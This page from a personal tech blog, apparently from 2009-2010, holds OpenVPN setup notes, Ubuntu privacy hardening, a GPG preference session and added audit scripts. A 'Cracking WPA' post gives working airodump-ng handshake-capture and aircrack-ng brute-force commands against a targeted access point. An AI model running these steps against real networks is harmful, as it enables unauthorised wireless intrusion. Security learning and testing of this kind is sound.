
deekayen's blog

DRUPAL license plate in NC

[Photo: car with DRUPAL license plate]

LOST: owner of a silver Nissan Altima with a DRUPAL license plate.

Who are you? I'd like to meet up. I had no idea there was someone so into Drupal in Harrisburg, at Dino's Pizza & Pasta.

---

FOUND! It's shrop's car. I shoulda known...

Submitted by deekayen on Wed, 04/21/2010 - 9:49pm

OpenVPN server on Debian Lenny

vi /etc/hostname
mkdir .ssh
cd .ssh
vi authorized_keys
apt-get update
apt-get upgrade
apt-get --no-install-recommends install openvpn bridge-utils openssh-blacklist-extra
vi /etc/ssh/sshd_config
# turn off password logins
vi /etc/sysctl.conf
# turn on ipv4 forwarding
vi /etc/network/interfaces
# turn dhcp into static if you want to
cp -R /usr/share/doc/openvpn/examples/easy-rsa /etc/openvpn/
cd /etc/openvpn/easy-rsa/2.0/
vi vars
# mod defaults on bottom
. ./vars
./clean-all
./build-ca
./build-key-server server
./build-key home
./build-key pleaseignore
./build-key david
./build-dh
cd keys/
cp ca.crt ca.key dh1024.pem server.crt server.key /etc/openvpn
cd /etc/openvpn/
openvpn --genkey --secret ta.key
vi /etc/openvpn/server.conf

port 1194
dev tun
server 10.10.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
#client-config-dir ccd
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
comp-lzo
keepalive 10 60
ping-timer-rem
persist-tun
persist-key
push "route 10.10.0.0 255.255.255.0"
push "redirect-gateway"
push "dhcp-option DNS 75.127.97.6"
client-to-client
#tls-auth ta.key 0
cipher BF-CBC
#cipher DES-EDE3-CBC
#cipher AES-128-CBC
max-clients 20
user nobody
group nogroup
status openvpn-status.log
log /var/log/openvpn.log
log-append /var/log/openvpn.log
verb 2
mute 20

Xen host:

mkdir /dev/net/
mknod /dev/net/tun c 10 200
openvpn --mktun --dev tun0
iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o eth0 -j SNAT --to-source 71.20.22.71
vi /etc/rc.local

iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o eth0 -j SNAT --to-source 71.20.22.71

OpenVZ host (see also):

modprobe tun
vzctl set 101 --devices c:10:200:rw --save
vzctl set 101 --capability net_admin:on --save
vzctl exec 101 mkdir -p /dev/net
vzctl exec 101 mknod /dev/net/tun c 10 200
vzctl exec 101 chmod 600 /dev/net/tun
vzctl set 101 \
--iptables ip_tables \
--iptables ipt_REJECT \
--iptables ipt_tos \
--iptables ipt_limit \
--iptables ipt_multiport \
--iptables iptable_filter \
--iptables iptable_mangle \
--iptables ipt_TCPMSS \
--iptables ipt_tcpmss \
--iptables ipt_ttl \
--iptables ipt_length \
--iptables ipt_conntrack \
--iptables iptable_nat \
--iptables ip_nat_ftp \
--iptables ip_nat_irc \
--iptables ipt_TOS \
--iptables ipt_state \
--save

In the VM:

vi /etc/rc.local

iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o venet0 -j SNAT --to-source 71.20.22.71
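
A quick audit of the server.conf from this post, as an added example that is not part of the original notes. The function name and finding labels are made up for illustration; it flags the 1024-bit DH file, the 64-bit block cipher, the commented-out tls-auth line and the CA private key copied into /etc/openvpn.

```shell
#!/bin/sh
# Added example: report weak settings in an OpenVPN server.conf.
# Prints one finding per line and nothing when no check fires.
audit_openvpn_conf() {  # usage: audit_openvpn_conf /path/to/server.conf
    awk '
        /^[ \t]*[#;][ \t]*tls-auth/ { tls_off = 1 }   # directive present but disabled
        /^[ \t]*[#;]/               { next }          # skip every other comment
        $1 == "tls-auth" || $1 == "tls-crypt" { tls = 1 }
        $1 == "cipher" { cipher = toupper($2) }
        $1 == "dh"     { dh = $2 }
        END {
            # easy-rsa 2.0 names the file dh<bits>.pem, so read the size from it.
            bits = dh; sub(/.*\//, "", bits); gsub(/[^0-9]/, "", bits)
            if (bits != "" && bits + 0 < 2048)
                print "WEAK_DH " dh ": use 2048-bit or larger parameters"
            # Blowfish, DES, 3DES and CAST5 all have 64-bit blocks.
            if (cipher ~ /^(BF|DES|CAST5)-/)
                print "WEAK_CIPHER " cipher ": 64-bit block cipher"
            if (!tls)
                print "NO_TLS_AUTH" (tls_off ? ": directive is commented out" : "")
        }
    ' "$1"
    # The server only verifies client certificates; the CA private key that
    # signs them does not need to be stored next to the config.
    if [ -e "$(dirname "$1")/ca.key" ]; then
        echo "CA_KEY_ON_SERVER $(dirname "$1")/ca.key"
    fi
}

# Constructed sample: three directives as they appear in the config above.
demo=$(mktemp -d)
printf '%s\n' 'dh dh1024.pem' '#tls-auth ta.key 0' 'cipher BF-CBC' > "$demo/server.conf"
: > "$demo/ca.key"    # empty stand-in for the copied CA key
audit_openvpn_conf "$demo/server.conf"
rm -rf "$demo"
```

The DH check relies on the easy-rsa file naming, so a renamed parameter file is not detected.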

Submitted by deekayen on Fri, 12/11/2009 - 8:07pm

Cracking WPA

Start airmon-ng on channel 6.

sudo airmon-ng start wlan0 6

Target the MAC of a specific access point until the handshake for that MAC shows up at the top right of the output, signifying that it captured a handshake.

sudo airodump-ng -c 6 --bssid 00:00:00:A0:32:14 -w psk wlan0

If you grabbed a huge capture, figure out how to split it with Wireshark. Test all simple passwords 1 to 8 characters long. John the Ripper is also a possibility for piping passwords to aircrack-ng.

perl ./wg.pl -l 1 -u 8 -v abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng -e linksys -w - psk-01.cap

The best passwords make use of the full 63 character limit with WPA2 + AES (given today's possible options). That generates enough possible permutations to make your average calculator read "Error" just showing you how many possibilities there are. Even if you only use the same 5 characters to make a 63 character string, that's still a crazy hard password.
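
The keyspace argument above, worked through as an added example (not code from the original post). The function names are illustrative; it compares the 1 to 8 character sweep over 62 symbols with 63-character passphrases, including one built from only 5 symbols, and generates a random 63-character passphrase.

```shell
#!/bin/sh
# Added example: size of the search space for WPA passphrases.

# Bits of keyspace for LENGTH symbols drawn from ALPHABET distinct characters.
keyspace_bits() {  # usage: keyspace_bits ALPHABET LENGTH
    awk -v n="$1" -v len="$2" 'BEGIN { printf "%.1f\n", len * log(n) / log(2) }'
}

# Candidates in a sweep over every length from MIN to MAX,
# matching the 1 to 8 character range in the command above.
sweep_candidates() {  # usage: sweep_candidates ALPHABET MIN MAX
    awk -v n="$1" -v lo="$2" -v hi="$3" 'BEGIN {
        p = 1; total = 0
        for (k = 1; k <= hi; k++) { p *= n; if (k >= lo) total += p }
        printf "%.0f\n", total
    }'
}

# Random passphrase of LENGTH (default 63) letters and digits from the kernel RNG.
random_passphrase() {
    head -c 4096 /dev/urandom | LC_ALL=C tr -dc 'A-Za-z0-9' | cut -c1-"${1:-63}"
}

echo "sweep of 1-8 chars over 62 symbols: $(sweep_candidates 62 1 8) candidates"
echo "8 chars, 62 symbols:  $(keyspace_bits 62 8) bits"
echo "63 chars, 5 symbols:  $(keyspace_bits 5 63) bits"
echo "63 chars, 62 symbols: $(keyspace_bits 62 63) bits"
echo "sample passphrase:    $(random_passphrase)"
```

Each extra bit doubles the search, so the 5-symbol, 63-character string is roughly 2^99 times larger a space than the whole 8-character, 62-symbol one.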

Submitted by deekayen on Tue, 12/08/2009 - 2:44am


Paranoid USB Ubuntu

Download the Ubuntu alternate i386 install. x86-64 is nice, but you don't necessarily know you'll be booting a portable drive on a 64-bit machine.

Select the USA - Dvorak region.

Create a 100 MB /boot partition as ext3 and the rest as a physical volume for encryption. Use Twofish 256, *not* the default AES. Then in the encrypted partition, mount / as ext3. If you have lots of extra space, you might make an LVM inside the encrypted partition that contains swap, /, and /home.

Create the account with a name and login of anonymous.

Mozilla addons:

In about:config, toggle dom.storage.enabled to false.

Mozilla (non-privacy related)

Thunderbird

Misc

apt-get update

apt-get upgrade

apt-get purge ubuntuone-client-gnome empathy evolution evolution-common evolution-couchdb evolution-data-server evolution-exchange evolution-indicator evolution-plugins evolution-webcal f-spot xsane xsane-common

Edit fstab to not mount /boot by default.

apt-get install revelation aircrack-ng vidalia build-essential fakeroot devscripts ettercap-gtk pidgin-otr transmission htop clamtk ndisgtk gnome-rdp filezilla gstm mumble wifi-radar gpa gtkhash gufw thunderbird cvs gettext sshfs gnome-do openssh-server nmap skype macchanger-gtk arp-scan

apt-get install mysql-server apache2 apache2-threaded-dev php5 php5-cgi php5-cli php5-gd php5-common php-pear php5-curl php5-mysql cvs curl php5-mcrypt php5-dev libapache2-mod-php5 gawk patch w32codecs libdvdcss2 non-free-codecs ubuntu-restricted-extras openjdk-6-jre workrave

apt-get purge postfix

Use shred -uzv instead of rm to delete files.

To get automatic hash verification for downloads, use torrent options. In Transmission, you can configure it to only accept encrypted communication from peers and to talk to the tracker through Tor.

Create a menu launcher for macchanger-gtk. Use arp-scan by doing something like sudo arp-scan -l -I eth1

Upgrade the GPG signature hash. Sig hashes in high grade SHA will be truncated with traditional 1024D keys, so this probably involves upgrading to a 4096R/4096 key. 1024D key used as an example:

localhost:~ davidnorman$ gpg --version
gpg (GnuPG) 1.4.9
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Home: ~/.gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH
Hash: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Compression: Uncompressed, ZIP, ZLIB, BZIP2
localhost:~ davidnorman$ gpg --edit-key 87A0709B
gpg (GnuPG) 1.4.9; Copyright (C) 2008 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Secret key is available.

pub  1024D/87A0709B  created: 2008-07-31  expires: never       usage: SC 
                     trust: unknown       validity: unknown
sub  4096g/B8474CFF  created: 2008-07-31  expires: never       usage: E  
sub  2048R/12740831  created: 2008-07-31  expires: never       usage: S  
[ unknown] (1). David Kent Norman (deekayen) <x@deekayen.net>

Command> setpref SHA512 SHA384 SHA256 SHA224 TWOFISH BLOWFISH 3DES CAST5 AES256 AES192 AES SHA1 RIPEMD160 BZIP2 ZLIB ZIP
Set preference list to:
     Cipher: TWOFISH, BLOWFISH, 3DES, CAST5, AES256, AES192, AES
     Digest: SHA512, SHA384, SHA256, SHA224, SHA1
     Compression: ZIP, Uncompressed
     Features: MDC, Keyserver no-modify
Really update the preferences? (y/N) y
                                     
You need a passphrase to unlock the secret key for
user: "David Kent Norman (deekayen) <x@deekayen.net>"
1024-bit DSA key, ID 87A0709B, created 2008-07-31

                 
pub  1024D/87A0709B  created: 2008-07-31  expires: never       usage: SC 
                     trust: unknown       validity: unknown
sub  4096g/B8474CFF  created: 2008-07-31  expires: never       usage: E  
sub  2048R/12740831  created: 2008-07-31  expires: never       usage: S  
[ unknown] (1). David Kent Norman (deekayen) <x@deekayen.net>

Command> q
Save changes? (y/N) y
localhost:~ davidnorman$
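
To see which signing keys on a keyring are affected by the truncation described above, this added example (not from the original post) reads the output of gpg --with-colons --list-keys. The function name is illustrative, and the sample listing is constructed from the key shown in the session, with the short key IDs padded with zeros to the 16-digit width of the colon format.

```shell
#!/bin/sh
# Added example: which signing keys in a gpg --with-colons listing would
# truncate a given digest. Reads the listing on stdin.
effective_digest_bits() {  # usage: effective_digest_bits DIGEST < listing
    awk -F: -v digest="$1" '
        BEGIN {
            bits["MD5"] = 128; bits["SHA1"] = 160; bits["RIPEMD160"] = 160
            bits["SHA224"] = 224; bits["SHA256"] = 256
            bits["SHA384"] = 384; bits["SHA512"] = 512
            want = bits[toupper(digest)]
        }
        # Colon fields: 1 record type, 3 key length, 4 algorithm
        # (1 = RSA, 17 = DSA), 5 key ID, 12 capabilities (s = can sign).
        ($1 == "pub" || $1 == "sub") && $12 ~ /s/ {
            if ($4 == 17 && $3 + 0 <= 1024) {
                # A 1024-bit DSA key has a 160-bit q, which caps the digest.
                eff = (want > 160) ? 160 : want
                printf "%s DSA-%d %d%s\n", $5, $3, eff, (eff < want ? " TRUNCATED" : "")
            } else if ($4 == 1) {
                printf "%s RSA-%d %d\n", $5, $3, want
            }
        }
    '
}

# Constructed listing modelled on the key shown above. The 16-digit key IDs
# are the short IDs from the session padded with zeros, not real long IDs.
sample_listing() {
    cat <<'EOF'
pub:-:1024:17:0000000087A0709B:2008-07-31:::-:David Kent Norman (deekayen) <x@deekayen.net>::scSC:
sub:-:4096:16:00000000B8474CFF:2008-07-31::::::e:
sub:-:2048:1:0000000012740831:2008-07-31::::::s:
EOF
}

sample_listing | effective_digest_bits SHA512
```

Each output line is the key ID, the algorithm and size, and the number of digest bits that actually end up in a signature made with the requested hash.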

Submitted by deekayen on Sat, 10/10/2009 - 12:44am

Dam Burst for Green Dam

I don't run Windows nor have I ever used Green Dam Youth Escort software, but I thought it might be nice to mirror the install file of Dam Burst 1.2 - tested with Green Dam 3.17, released September 28th, 2009 by Jon Oberheide.

MD5 (DamBurst-1.2.exe) = bacb81fa63707e78ca1ec66d2241773a

Submitted by deekayen on Wed, 09/30/2009 - 5:36pm
